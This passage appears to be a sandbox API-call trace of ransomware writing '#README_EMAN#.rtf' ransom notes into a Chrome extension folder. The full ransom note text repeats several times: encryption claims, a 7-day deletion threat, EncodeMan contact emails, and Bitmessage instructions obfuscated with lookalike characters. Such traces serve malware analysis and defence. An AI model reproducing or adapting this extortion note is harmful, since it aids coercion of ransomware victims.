c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nu y5\x97>\x13¹\x0cgR6÷Æ\x1dáh\x8f\"ûT¹\x9fcN", lpUsedDefaultChar=0x0) returned 8717 [0278.217] WriteFile (in: hFile=0x294, lpBuffer=0x1f495e8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f495e8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.218] CloseHandle (hObject=0x294) returned 1 [0278.218] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\#readme_eman#.rtf")) returned 0xffffffff [0278.218] GetLastError () returned 0x2 [0278.218] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\it\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0278.219] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.219] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.219] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f495e8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 